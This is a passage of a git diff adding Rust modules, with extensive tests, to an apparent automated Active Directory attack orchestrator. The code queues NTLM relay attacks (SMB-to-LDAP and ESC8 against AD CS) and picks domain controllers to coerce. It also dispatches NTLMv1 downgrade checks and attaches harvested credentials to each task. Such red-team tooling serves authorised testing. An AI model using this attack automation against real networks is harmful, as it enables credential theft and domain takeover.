+ .get("target_ip")
+ .or_else(|| vuln.details.get("ip"))
+ .and_then(|v| v.as_str())
+ .unwrap_or(&vuln.target);
+
+ if target_ip.is_empty() {
+ continue;
+ }
+
+ let relay_key = format!("smb_relay:{target_ip}");
+ if state.is_processed(DEDUP_SET, &relay_key) {
+ continue;
+ }
+
+ let coercion_source = find_coercion_source(&state.domain_controllers, |ip| {
+ state.is_processed(DEDUP_COERCED_DCS, ip)
+ });
+
+ let cred = match state.credentials.first() {
+ Some(c) => c.clone(),
+ None => continue,
+ };
+
+ items.push(RelayWork {
+ dedup_key: relay_key,
+ relay_type: RelayType::SmbToLdap,
+ relay_target: target_ip.to_string(),
+ coercion_source,
+ listener: listener.to_string(),
+ credential: cred,
+ });
+ }
+
+ // Path 2: Relay to ADCS web enrollment (ESC8)
+ for vuln in state.discovered_vulnerabilities.values() {
+ let vtype = vuln.vuln_type.to_lowercase();
+ if vtype != "esc8" && vtype != "adcs_web_enrollment" {
+ continue;
+ }
+ if state.exploited_vulnerabilities.contains(&vuln.vuln_id) {
+ continue;
+ }
+
+ let ca_host = vuln
+ .details
+ .get("ca_host")
+ .or_else(|| vuln.details.get("target_ip"))
+ .and_then(|v| v.as_str())
+ .unwrap_or(&vuln.target);
+
+ if ca_host.is_empty() {
+ continue;
+ }
+
+ let relay_key = format!("esc8_relay:{ca_host}");
+ if state.is_processed(DEDUP_SET, &relay_key) {
+ continue;
+ }
+
+ let coercion_source = find_coercion_source(&state.domain_controllers, |ip| {
+ state.is_processed(DEDUP_COERCED_DCS, ip)
+ });
+
+ let cred = match state.credentials.first() {
+ Some(c) => c.clone(),
+ None => continue,
+ };
+
+ let ca_name = vuln
+ .details
+ .get("ca_name")
+ .and_then(|v| v.as_str())
+ .unwrap_or("")
+ .to_string();
+
+ let domain = vuln
+ .details
+ .get("domain")
+ .and_then(|v| v.as_str())
+ .unwrap_or("")
+ .to_string();
+
+ items.push(RelayWork {
+ dedup_key: relay_key,
+ relay_type: RelayType::Esc8 { ca_name, domain },
+ relay_target: ca_host.to_string(),
+ coercion_source,
+ listener: listener.to_string(),
+ credential: cred,
+ });
+ }
+
+ items
+}
+
+/// Find the best coercion source (a DC IP we can PetitPotam/PrinterBug).
+///
+/// Takes the domain_controllers map and a closure to check dedup state,
+/// keeping us decoupled from `StateInner`'s module visibility.
+fn find_coercion_source(
+ domain_controllers: &std::collections::HashMap,
+ is_processed: impl Fn(&str) -> bool,
+) -> Option {
+ // Prefer a DC we haven't already coerced
+ domain_controllers
+ .values()
+ .find(|ip| !is_processed(ip))
+ .or_else(|| domain_controllers.values().next())
+ .cloned()
+}
+
+struct RelayWork {
+ dedup_key: String,
+ relay_type: RelayType,
+ relay_target: String,
+ coercion_source: Option,
+ listener: String,
+ credential: ares_core::models::Credential,
+}
+
+enum RelayType {
+ SmbToLdap,
+ Esc8 { ca_name: String, domain: String },
+}
+
+impl std::fmt::Display for RelayType {
+ fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
+ match self {
+ Self::SmbToLdap => write!(f, "smb_to_ldap"),
+ Self::Esc8 { .. } => write!(f, "esc8_adcs"),
+ }
+ }
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use std::collections::HashMap;
+
+ #[test]
+ fn relay_type_display() {
+ assert_eq!(RelayType::SmbToLdap.to_string(), "smb_to_ldap");
+ assert_eq!(
+ RelayType::Esc8 {
+ ca_name: "CA".into(),
+ domain: "contoso.local".into()
+ }
+ .to_string(),
+ "esc8_adcs"
+ );
+ }
+
+ #[test]
+ fn dedup_key_format_smb() {
+ let key = format!("smb_relay:{}", "192.168.58.22");
+ assert_eq!(key, "smb_relay:192.168.58.22");
+ }
+
+ #[test]
+ fn dedup_key_format_esc8() {
+ let key = format!("esc8_relay:{}", "192.168.58.10");
+ assert_eq!(key, "esc8_relay:192.168.58.10");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_SET, "ntlm_relay");
+ }
+
+ #[test]
+ fn find_coercion_source_prefers_unprocessed() {
+ let mut dcs = HashMap::new();
+ dcs.insert("contoso.local".into(), "192.168.58.10".into());
+ dcs.insert("fabrikam.local".into(), "192.168.58.20".into());
+
+ // First DC already processed, second not
+ let result = find_coercion_source(&dcs, |ip| ip == "192.168.58.10");
+ assert!(result.is_some());
+ assert_eq!(result.unwrap(), "192.168.58.20");
+ }
+
+ #[test]
+ fn find_coercion_source_falls_back_to_any() {
+ let mut dcs = HashMap::new();
+ dcs.insert("contoso.local".into(), "192.168.58.10".into());
+
+ // All processed, still returns one
+ let result = find_coercion_source(&dcs, |_| true);
+ assert!(result.is_some());
+ assert_eq!(result.unwrap(), "192.168.58.10");
+ }
+
+ #[test]
+ fn find_coercion_source_empty_map() {
+ let dcs = HashMap::new();
+ let result = find_coercion_source(&dcs, |_| false);
+ assert!(result.is_none());
+ }
+
+ #[test]
+ fn esc8_vuln_type_matching() {
+ let types = ["esc8", "adcs_web_enrollment", "ESC8", "ADCS_WEB_ENROLLMENT"];
+ for t in &types {
+ let vtype = t.to_lowercase();
+ assert!(
+ vtype == "esc8" || vtype == "adcs_web_enrollment",
+ "{t} should match"
+ );
+ }
+ }
+
+ #[test]
+ fn smb_signing_vuln_type_matching() {
+ let vtype = "smb_signing_disabled".to_lowercase();
+ assert_eq!(vtype, "smb_signing_disabled");
+
+ let not_smb = "mssql_access".to_lowercase();
+ assert_ne!(not_smb, "smb_signing_disabled");
+ }
+
+ #[test]
+ fn relay_work_construction() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let work = RelayWork {
+ dedup_key: "smb_relay:192.168.58.22".into(),
+ relay_type: RelayType::SmbToLdap,
+ relay_target: "192.168.58.22".into(),
+ coercion_source: Some("192.168.58.10".into()),
+ listener: "192.168.58.100".into(),
+ credential: cred.clone(),
+ };
+ assert_eq!(work.relay_target, "192.168.58.22");
+ assert_eq!(work.listener, "192.168.58.100");
+ assert_eq!(work.credential.username, "admin");
+ }
+
+ #[test]
+ fn smb_to_ldap_payload_structure() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let payload = json!({
+ "technique": "ntlm_relay_ldap",
+ "relay_target": "192.168.58.22",
+ "listener_ip": "192.168.58.100",
+ "coercion_source": "192.168.58.10",
+ "credential": {
+ "username": cred.username,
+ "password": cred.password,
+ "domain": cred.domain,
+ },
+ });
+ assert_eq!(payload["technique"], "ntlm_relay_ldap");
+ assert_eq!(payload["relay_target"], "192.168.58.22");
+ assert_eq!(payload["listener_ip"], "192.168.58.100");
+ assert_eq!(payload["credential"]["username"], "admin");
+ assert_eq!(payload["credential"]["domain"], "contoso.local");
+ }
+
+ #[test]
+ fn esc8_payload_structure() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let relay_type = RelayType::Esc8 {
+ ca_name: "contoso-CA".into(),
+ domain: "contoso.local".into(),
+ };
+ let payload = json!({
+ "technique": "ntlm_relay_adcs",
+ "relay_target": "192.168.58.10",
+ "listener_ip": "192.168.58.100",
+ "ca_name": "contoso-CA",
+ "domain": "contoso.local",
+ "coercion_source": "192.168.58.20",
+ "credential": {
+ "username": cred.username,
+ "password": cred.password,
+ "domain": cred.domain,
+ },
+ });
+ assert_eq!(payload["technique"], "ntlm_relay_adcs");
+ assert_eq!(payload["ca_name"], "contoso-CA");
+ assert_eq!(payload["domain"], "contoso.local");
+ assert_eq!(relay_type.to_string(), "esc8_adcs");
+ }
+
+ #[test]
+ fn target_ip_extraction_from_vuln_details() {
+ let details = serde_json::json!({"target_ip": "192.168.58.22", "ip": "192.168.58.23"});
+ let fallback = "192.168.58.99";
+ let target = details
+ .get("target_ip")
+ .or_else(|| details.get("ip"))
+ .and_then(|v| v.as_str())
+ .unwrap_or(fallback);
+ assert_eq!(target, "192.168.58.22");
+ }
+
+ #[test]
+ fn target_ip_fallback_to_ip_field() {
+ let details = serde_json::json!({"ip": "192.168.58.23"});
+ let fallback = "192.168.58.99";
+ let target = details
+ .get("target_ip")
+ .or_else(|| details.get("ip"))
+ .and_then(|v| v.as_str())
+ .unwrap_or(fallback);
+ assert_eq!(target, "192.168.58.23");
+ }
+
+ #[test]
+ fn target_ip_fallback_to_vuln_target() {
+ let details = serde_json::json!({});
+ let fallback = "192.168.58.99";
+ let target = details
+ .get("target_ip")
+ .or_else(|| details.get("ip"))
+ .and_then(|v| v.as_str())
+ .unwrap_or(fallback);
+ assert_eq!(target, "192.168.58.99");
+ }
+
+ #[test]
+ fn ca_host_extraction_fallback() {
+ let details = serde_json::json!({"ca_host": "192.168.58.10"});
+ let fallback = "192.168.58.99";
+ let ca_host = details
+ .get("ca_host")
+ .or_else(|| details.get("target_ip"))
+ .and_then(|v| v.as_str())
+ .unwrap_or(fallback);
+ assert_eq!(ca_host, "192.168.58.10");
+
+ let details2 = serde_json::json!({"target_ip": "192.168.58.20"});
+ let ca_host2 = details2
+ .get("ca_host")
+ .or_else(|| details2.get("target_ip"))
+ .and_then(|v| v.as_str())
+ .unwrap_or(fallback);
+ assert_eq!(ca_host2, "192.168.58.20");
+ }
+
+ #[test]
+ fn ca_name_extraction() {
+ let details = serde_json::json!({"ca_name": "contoso-CA"});
+ let ca_name = details
+ .get("ca_name")
+ .and_then(|v| v.as_str())
+ .unwrap_or("")
+ .to_string();
+ assert_eq!(ca_name, "contoso-CA");
+
+ let details2 = serde_json::json!({});
+ let ca_name2 = details2
+ .get("ca_name")
+ .and_then(|v| v.as_str())
+ .unwrap_or("")
+ .to_string();
+ assert_eq!(ca_name2, "");
+ }
+
+ #[test]
+ fn find_coercion_source_all_unprocessed() {
+ let mut dcs = HashMap::new();
+ dcs.insert("contoso.local".into(), "192.168.58.10".into());
+ dcs.insert("fabrikam.local".into(), "192.168.58.20".into());
+
+ let result = find_coercion_source(&dcs, |_| false);
+ assert!(result.is_some());
+ }
+
+ #[test]
+ fn relay_type_display_exhaustive() {
+ let smb = RelayType::SmbToLdap;
+ assert_eq!(format!("{smb}"), "smb_to_ldap");
+
+ let esc8 = RelayType::Esc8 {
+ ca_name: String::new(),
+ domain: String::new(),
+ };
+ assert_eq!(format!("{esc8}"), "esc8_adcs");
+ }
+
+ // --- collect_relay_work integration tests ---
+
+ use crate::orchestrator::state::SharedState;
+
+ fn make_cred() -> ares_core::models::Credential {
+ ares_core::models::Credential {
+ id: "c1".into(),
+ username: "svcadmin".into(),
+ password: "S3cure!Pass".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "kerberoast".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ fn make_smb_vuln(id: &str, target_ip: &str) -> ares_core::models::VulnerabilityInfo {
+ let mut details = HashMap::new();
+ details.insert(
+ "target_ip".to_string(),
+ serde_json::Value::String(target_ip.to_string()),
+ );
+ ares_core::models::VulnerabilityInfo {
+ vuln_id: id.to_string(),
+ vuln_type: "smb_signing_disabled".to_string(),
+ target: target_ip.to_string(),
+ discovered_by: "scanner".to_string(),
+ discovered_at: chrono::Utc::now(),
+ details,
+ recommended_agent: String::new(),
+ priority: 5,
+ }
+ }
+
+ fn make_esc8_vuln(
+ id: &str,
+ ca_host: &str,
+ ca_name: &str,
+ domain: &str,
+ ) -> ares_core::models::VulnerabilityInfo {
+ let mut details = HashMap::new();
+ details.insert(
+ "ca_host".to_string(),
+ serde_json::Value::String(ca_host.to_string()),
+ );
+ details.insert(
+ "ca_name".to_string(),
+ serde_json::Value::String(ca_name.to_string()),
+ );
+ details.insert(
+ "domain".to_string(),
+ serde_json::Value::String(domain.to_string()),
+ );
+ ares_core::models::VulnerabilityInfo {
+ vuln_id: id.to_string(),
+ vuln_type: "esc8".to_string(),
+ target: ca_host.to_string(),
+ discovered_by: "scanner".to_string(),
+ discovered_at: chrono::Utc::now(),
+ details,
+ recommended_agent: String::new(),
+ priority: 8,
+ }
+ }
+
+ #[tokio::test]
+ async fn collect_relay_work_empty_state() {
+ let shared = SharedState::new("test".into());
+ let state = shared.read().await;
+ let work = collect_relay_work(&state, "192.168.58.100");
+ assert!(work.is_empty(), "empty state should produce no work");
+ }
+
+ #[tokio::test]
+ async fn collect_relay_work_no_credentials() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ s.discovered_vulnerabilities
+ .insert("v1".into(), make_smb_vuln("v1", "192.168.58.22"));
+ }
+ let state = shared.read().await;
+ let work = collect_relay_work(&state, "192.168.58.100");
+ assert!(work.is_empty(), "no credentials should produce no work");
+ }
+
+ #[tokio::test]
+ async fn collect_relay_work_smb_signing_disabled() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ s.credentials.push(make_cred());
+ s.discovered_vulnerabilities
+ .insert("v1".into(), make_smb_vuln("v1", "192.168.58.22"));
+ s.domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ }
+ let state = shared.read().await;
+ let work = collect_relay_work(&state, "192.168.58.100");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].dedup_key, "smb_relay:192.168.58.22");
+ assert_eq!(work[0].relay_target, "192.168.58.22");
+ assert_eq!(work[0].listener, "192.168.58.100");
+ assert!(matches!(work[0].relay_type, RelayType::SmbToLdap));
+ assert_eq!(work[0].coercion_source, Some("192.168.58.10".into()));
+ assert_eq!(work[0].credential.username, "svcadmin");
+ }
+
+ #[tokio::test]
+ async fn collect_relay_work_esc8_vuln() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ s.credentials.push(make_cred());
+ s.discovered_vulnerabilities.insert(
+ "v2".into(),
+ make_esc8_vuln("v2", "192.168.58.30", "contoso-CA", "contoso.local"),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_relay_work(&state, "192.168.58.100");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].dedup_key, "esc8_relay:192.168.58.30");
+ assert_eq!(work[0].relay_target, "192.168.58.30");
+ match &work[0].relay_type {
+ RelayType::Esc8 { ca_name, domain } => {
+ assert_eq!(ca_name, "contoso-CA");
+ assert_eq!(domain, "contoso.local");
+ }
+ _ => panic!("expected Esc8 relay type"),
+ }
+ // No DCs configured → coercion_source is None
+ assert!(work[0].coercion_source.is_none());
+ }
+
+ #[tokio::test]
+ async fn collect_relay_work_skips_already_processed_dedup() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ s.credentials.push(make_cred());
+ s.discovered_vulnerabilities
+ .insert("v1".into(), make_smb_vuln("v1", "192.168.58.22"));
+ // Mark the relay key as already processed
+ s.mark_processed(DEDUP_SET, "smb_relay:192.168.58.22".into());
+ }
+ let state = shared.read().await;
+ let work = collect_relay_work(&state, "192.168.58.100");
+ assert!(
+ work.is_empty(),
+ "already-processed dedup key should be skipped"
+ );
+ }
+
+ #[tokio::test]
+ async fn collect_relay_work_skips_exploited_vulns() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ s.credentials.push(make_cred());
+ s.discovered_vulnerabilities
+ .insert("v1".into(), make_smb_vuln("v1", "192.168.58.22"));
+ s.exploited_vulnerabilities.insert("v1".into());
+ }
+ let state = shared.read().await;
+ let work = collect_relay_work(&state, "192.168.58.100");
+ assert!(work.is_empty(), "exploited vulns should be skipped");
+ }
+
+ #[tokio::test]
+ async fn collect_relay_work_multiple_vulns() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ s.credentials.push(make_cred());
+ s.discovered_vulnerabilities
+ .insert("v1".into(), make_smb_vuln("v1", "192.168.58.22"));
+ s.discovered_vulnerabilities
+ .insert("v2".into(), make_smb_vuln("v2", "192.168.58.23"));
+ s.discovered_vulnerabilities.insert(
+ "v3".into(),
+ make_esc8_vuln("v3", "192.168.58.30", "contoso-CA", "contoso.local"),
+ );
+ s.domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ }
+ let state = shared.read().await;
+ let work = collect_relay_work(&state, "192.168.58.100");
+ assert_eq!(work.len(), 3, "should produce work for all 3 vulns");
+
+ let smb_count = work
+ .iter()
+ .filter(|w| matches!(w.relay_type, RelayType::SmbToLdap))
+ .count();
+ let esc8_count = work
+ .iter()
+ .filter(|w| matches!(w.relay_type, RelayType::Esc8 { .. }))
+ .count();
+ assert_eq!(smb_count, 2);
+ assert_eq!(esc8_count, 1);
+ }
+
+ #[tokio::test]
+ async fn collect_relay_work_ignores_unrelated_vuln_types() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ s.credentials.push(make_cred());
+ // Add an unrelated vuln type
+ let mut details = HashMap::new();
+ details.insert(
+ "target_ip".to_string(),
+ serde_json::Value::String("192.168.58.40".to_string()),
+ );
+ s.discovered_vulnerabilities.insert(
+ "v_unrelated".into(),
+ ares_core::models::VulnerabilityInfo {
+ vuln_id: "v_unrelated".into(),
+ vuln_type: "mssql_impersonation".into(),
+ target: "192.168.58.40".into(),
+ discovered_by: "scanner".into(),
+ discovered_at: chrono::Utc::now(),
+ details,
+ recommended_agent: String::new(),
+ priority: 3,
+ },
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_relay_work(&state, "192.168.58.100");
+ assert!(
+ work.is_empty(),
+ "unrelated vuln types should not produce work"
+ );
+ }
+
+ #[tokio::test]
+ async fn collect_relay_work_esc8_already_processed() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ s.credentials.push(make_cred());
+ s.discovered_vulnerabilities.insert(
+ "v2".into(),
+ make_esc8_vuln("v2", "192.168.58.30", "contoso-CA", "contoso.local"),
+ );
+ s.mark_processed(DEDUP_SET, "esc8_relay:192.168.58.30".into());
+ }
+ let state = shared.read().await;
+ let work = collect_relay_work(&state, "192.168.58.100");
+ assert!(work.is_empty(), "already-processed esc8 should be skipped");
+ }
+
+ #[tokio::test]
+ async fn collect_relay_work_mixed_exploited_and_fresh() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ s.credentials.push(make_cred());
+ s.discovered_vulnerabilities
+ .insert("v1".into(), make_smb_vuln("v1", "192.168.58.22"));
+ s.discovered_vulnerabilities
+ .insert("v2".into(), make_smb_vuln("v2", "192.168.58.23"));
+ // Only v1 is exploited
+ s.exploited_vulnerabilities.insert("v1".into());
+ }
+ let state = shared.read().await;
+ let work = collect_relay_work(&state, "192.168.58.100");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].relay_target, "192.168.58.23");
+ }
+
+ #[tokio::test]
+ async fn collect_relay_work_coercion_source_prefers_uncoerced_dc() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ s.credentials.push(make_cred());
+ s.discovered_vulnerabilities
+ .insert("v1".into(), make_smb_vuln("v1", "192.168.58.22"));
+ s.domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ s.domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ // Mark first DC as already coerced
+ s.mark_processed(DEDUP_COERCED_DCS, "192.168.58.10".into());
+ }
+ let state = shared.read().await;
+ let work = collect_relay_work(&state, "192.168.58.100");
+ assert_eq!(work.len(), 1);
+ assert_eq!(
+ work[0].coercion_source,
+ Some("192.168.58.20".into()),
+ "should prefer the uncoerced DC"
+ );
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/ntlmv1_downgrade.rs b/ares-cli/src/orchestrator/automation/ntlmv1_downgrade.rs
new file mode 100644
index 00000000..a89c9a77
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/ntlmv1_downgrade.rs
@@ -0,0 +1,382 @@
+//! auto_ntlmv1_downgrade -- detect DCs allowing NTLMv1 authentication.
+//!
+//! When a DC accepts NTLMv1 (LmCompatibilityLevel < 3), attackers can
+//! downgrade auth to capture NTLMv1 hashes via Responder/MITM, which are
+//! trivially crackable. This module dispatches a check per DC.
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Collect NTLMv1 downgrade work items from state (pure logic, no async).
+fn collect_ntlmv1_work(state: &StateInner) -> Vec {
+ if state.credentials.is_empty() {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ for (domain, dc_ip) in &state.all_domains_with_dcs() {
+ let dedup_key = format!("ntlmv1:{}", dc_ip);
+ if state.is_processed(DEDUP_NTLMV1_DOWNGRADE, &dedup_key) {
+ continue;
+ }
+
+ let cred = match state
+ .credentials
+ .iter()
+ .find(|c| c.domain.to_lowercase() == domain.to_lowercase())
+ .or_else(|| state.credentials.first())
+ {
+ Some(c) => c.clone(),
+ None => continue,
+ };
+
+ items.push(NtlmV1Work {
+ dedup_key,
+ domain: domain.clone(),
+ dc_ip: dc_ip.clone(),
+ credential: cred,
+ });
+ }
+
+ items
+}
+
+/// Checks each DC for NTLMv1 downgrade vulnerability.
+/// Interval: 45s.
+pub async fn auto_ntlmv1_downgrade(
+ dispatcher: Arc,
+ mut shutdown: watch::Receiver,
+) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("ntlmv1_downgrade") {
+ continue;
+ }
+
+ let work: Vec = {
+ let state = dispatcher.state.read().await;
+ collect_ntlmv1_work(&state)
+ };
+
+ for item in work {
+ let payload = json!({
+ "technique": "ntlmv1_downgrade_check",
+ "target_ip": item.dc_ip,
+ "domain": item.domain,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ });
+
+ let priority = dispatcher.effective_priority("ntlmv1_downgrade");
+ match dispatcher
+ .throttled_submit("recon", "recon", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ domain = %item.domain,
+ dc = %item.dc_ip,
+ "NTLMv1 downgrade check dispatched"
+ );
+
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_NTLMV1_DOWNGRADE, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_NTLMV1_DOWNGRADE, &item.dedup_key)
+ .await;
+
+ // Register ntlmv1_downgrade vulnerability proactively so it
+ // appears in reports without waiting for the agent's
+ // report_finding callback (which only logs).
+ let vuln = ares_core::models::VulnerabilityInfo {
+ vuln_id: format!("ntlmv1_{}", item.dc_ip.replace('.', "_")),
+ vuln_type: "ntlmv1_downgrade".to_string(),
+ target: item.dc_ip.clone(),
+ discovered_by: "auto_ntlmv1_downgrade".to_string(),
+ discovered_at: chrono::Utc::now(),
+ details: {
+ let mut d = std::collections::HashMap::new();
+ d.insert("target_ip".to_string(), json!(item.dc_ip));
+ d.insert("domain".to_string(), json!(item.domain));
+ d.insert(
+ "description".to_string(),
+ json!("DC allows NTLMv1 authentication (LmCompatibilityLevel < 3). NTLMv1 hashes are trivially crackable."),
+ );
+ d
+ },
+ recommended_agent: "credential_access".to_string(),
+ priority: dispatcher.effective_priority("ntlmv1_downgrade"),
+ };
+
+ match dispatcher
+ .state
+ .publish_vulnerability_with_strategy(
+ &dispatcher.queue,
+ vuln,
+ Some(&dispatcher.config.strategy),
+ )
+ .await
+ {
+ Ok(true) => {
+ info!(
+ domain = %item.domain,
+ dc = %item.dc_ip,
+ "NTLMv1 downgrade — vulnerability registered"
+ );
+ }
+ Ok(false) => {}
+ Err(e) => {
+ warn!(err = %e, dc = %item.dc_ip, "Failed to publish NTLMv1 downgrade vulnerability");
+ }
+ }
+ }
+ Ok(None) => {
+ debug!(domain = %item.domain, "NTLMv1 downgrade check deferred");
+ }
+ Err(e) => {
+ warn!(err = %e, domain = %item.domain, "Failed to dispatch NTLMv1 downgrade check");
+ }
+ }
+ }
+ }
+}
+
+struct NtlmV1Work {
+ dedup_key: String,
+ domain: String,
+ dc_ip: String,
+ credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("ntlmv1:{}", "192.168.58.10");
+ assert_eq!(key, "ntlmv1:192.168.58.10");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_NTLMV1_DOWNGRADE, "ntlmv1_downgrade");
+ }
+
+ #[test]
+ fn payload_structure_has_correct_technique() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let payload = json!({
+ "technique": "ntlmv1_downgrade_check",
+ "target_ip": "192.168.58.10",
+ "domain": "contoso.local",
+ "credential": {
+ "username": cred.username,
+ "password": cred.password,
+ "domain": cred.domain,
+ },
+ });
+ assert_eq!(payload["technique"], "ntlmv1_downgrade_check");
+ assert_eq!(payload["target_ip"], "192.168.58.10");
+ assert_eq!(payload["domain"], "contoso.local");
+ }
+
+ #[test]
+ fn work_struct_construction() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let work = NtlmV1Work {
+ dedup_key: "ntlmv1:192.168.58.10".into(),
+ domain: "contoso.local".into(),
+ dc_ip: "192.168.58.10".into(),
+ credential: cred,
+ };
+ assert_eq!(work.domain, "contoso.local");
+ assert_eq!(work.dc_ip, "192.168.58.10");
+ assert_eq!(work.credential.username, "admin");
+ }
+
+ #[test]
+ fn dedup_key_uses_dc_ip() {
+ // NTLMv1 dedup is by DC IP, not domain
+ let key = format!("ntlmv1:{}", "192.168.58.10");
+ assert!(key.starts_with("ntlmv1:"));
+ assert!(key.contains("192.168.58.10"));
+ }
+
+ // --- collect_ntlmv1_work tests ---
+
+ use crate::orchestrator::state::StateInner;
+
+ fn make_cred(username: &str, domain: &str) -> ares_core::models::Credential {
+ ares_core::models::Credential {
+ id: uuid::Uuid::new_v4().to_string(),
+ username: username.to_string(),
+ password: "P@ssw0rd!".to_string(), // pragma: allowlist secret
+ domain: domain.to_string(),
+ source: String::new(),
+ discovered_at: None,
+ is_admin: false,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ #[test]
+ fn collect_empty_state_produces_no_work() {
+ let state = StateInner::new("test".into());
+ let work = collect_ntlmv1_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_credentials_produces_no_work() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ let work = collect_ntlmv1_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_dc_with_matching_cred_produces_work() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state.credentials.push(make_cred("admin", "contoso.local"));
+ let work = collect_ntlmv1_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].dc_ip, "192.168.58.10");
+ assert_eq!(work[0].dedup_key, "ntlmv1:192.168.58.10");
+ assert_eq!(work[0].credential.username, "admin");
+ }
+
+ #[test]
+ fn collect_skips_already_processed_dedup() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state.credentials.push(make_cred("admin", "contoso.local"));
+ state.mark_processed(DEDUP_NTLMV1_DOWNGRADE, "ntlmv1:192.168.58.10".into());
+ let work = collect_ntlmv1_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_falls_back_to_first_credential() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_cred("fabuser", "fabrikam.local"));
+ let work = collect_ntlmv1_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "fabuser");
+ }
+
+ #[test]
+ fn collect_multiple_dcs_produces_multiple_work() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ state.credentials.push(make_cred("admin", "contoso.local"));
+ state
+ .credentials
+ .push(make_cred("fabadmin", "fabrikam.local"));
+ let work = collect_ntlmv1_work(&state);
+ assert_eq!(work.len(), 2);
+ }
+
+ #[test]
+ fn collect_dedup_key_uses_ip_not_domain() {
+ let mut state = StateInner::new("test".into());
+ state
